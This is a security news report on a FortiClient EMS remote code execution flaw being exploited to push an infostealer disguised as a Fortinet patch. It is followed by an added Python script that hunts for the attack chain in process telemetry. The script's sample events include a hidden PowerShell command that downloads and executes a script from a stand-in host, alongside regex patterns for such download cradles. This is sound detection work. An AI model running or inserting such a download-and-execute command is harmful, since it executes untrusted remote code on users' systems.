A critical FortiClient Endpoint Management Server (EMS) vulnerability patched in April has been exploited in fresh attacks to deploy information-stealing malware, Arctic Wolf reports.
The flaw, tracked as CVE-2026-35616 (CVSS score of 9.1), allows unauthenticated remote code execution (RCE): an attacker can exploit it over the network with crafted requests, without any credentials.
Fortinet rolled out hotfixes for the security defect in early April, warning that it had been exploited in the wild as a zero-day and urging immediate patching.
Unpatched FortiClient EMS deployments are now being targeted in a campaign deploying the EKZ Infostealer disguised as a fake Fortinet endpoint patch.
The payload was executed through FortiClient-managed VPN scripting workflows, using command scripts that in turn invoked PowerShell, which suggests the attackers had prior knowledge of the affected environment.
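The execution chain described above (a FortiClient-managed script launching a command script that launches PowerShell to fetch a "patch") is something an endpoint telemetry hunt can look for. The following is an added illustration of that hunt, not code from Arctic Wolf, Fortinet or the article's source; it walks Sysmon-style process-creation records, flags PowerShell whose ancestry runs through a FortiClient process and cmd.exe, and separately scores download-cradle arguments and "Fortinet ... patch" names. The event records, paths and command lines are constructed sample data, and the assumption that the agent shows up in the process tree under a path containing "forticlient" is mine, not a documented indicator.

```python
"""Hunt for PowerShell launched from a FortiClient-managed script chain.

Added illustration, not the vendor's or the researchers' code. Events mirror
Sysmon Event ID 1 fields (pid, ppid, image, cmdline); all records below are
constructed, and the "forticlient" ancestor match is an assumption.
"""
import re

# Constructed sample events: a benign PowerShell launch and the suspicious chain.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe",
     "cmdline": "FortiClient.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\ProgramData\vpn_post_connect.cmd"'},  # assumed script name
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/Fortinet_Endpoint_Patch.ps1')\"")},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

# Common download-cradle / evasion switches seen in script-driven PowerShell abuse.
SUSPICIOUS_ARGS = re.compile(
    r"(-e(nc|ncodedcommand)?\s|-ep\s+bypass|-executionpolicy\s+bypass|"
    r"-w(indowstyle)?\s+hidden|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|\biex\b)",
    re.IGNORECASE,
)
# Lure naming from the article: an "endpoint patch" that claims to be from Fortinet.
FAKE_PATCH_NAME = re.compile(r"forti(net|client)[^\s'\"]*patch", re.IGNORECASE)
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestry(by_pid, event):
    """Walk ppid links from event to the root; stops on cycles or unknown parents."""
    chain, seen = [], set()
    cur = event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain  # [event, parent, grandparent, ...]


def find_suspicious_chains(events):
    """Return one finding per PowerShell process that matches any indicator."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if _basename(event["image"]) not in POWERSHELL_HOSTS:
            continue
        chain = _ancestry(by_pid, event)
        names = [_basename(c["image"]) for c in chain]
        # Assumption: the managed agent appears under a "forticlient" path.
        from_forticlient = any("forticlient" in c["image"].lower() for c in chain[1:])
        via_cmd_script = "cmd.exe" in names[1:]
        reasons = []
        if from_forticlient and via_cmd_script:
            reasons.append("powershell spawned through a FortiClient -> cmd.exe chain")
        if SUSPICIOUS_ARGS.search(event["cmdline"]):
            reasons.append("download-cradle or evasion arguments")
        if FAKE_PATCH_NAME.search(event["cmdline"]):
            reasons.append("'Fortinet ... patch' lure name in command line")
        if reasons:
            findings.append({"pid": event["pid"], "chain": names[::-1], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f["pid"], " -> ".join(f["chain"]), f["reasons"])
```

The ancestry rule and the argument rule are scored independently on purpose: a legitimate administrator's PowerShell launched under the same agent would trip the chain rule alone, while an encoded command run from an unrelated parent still trips the argument rule, so both need to be reviewed rather than treated as a single true/false verdict.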








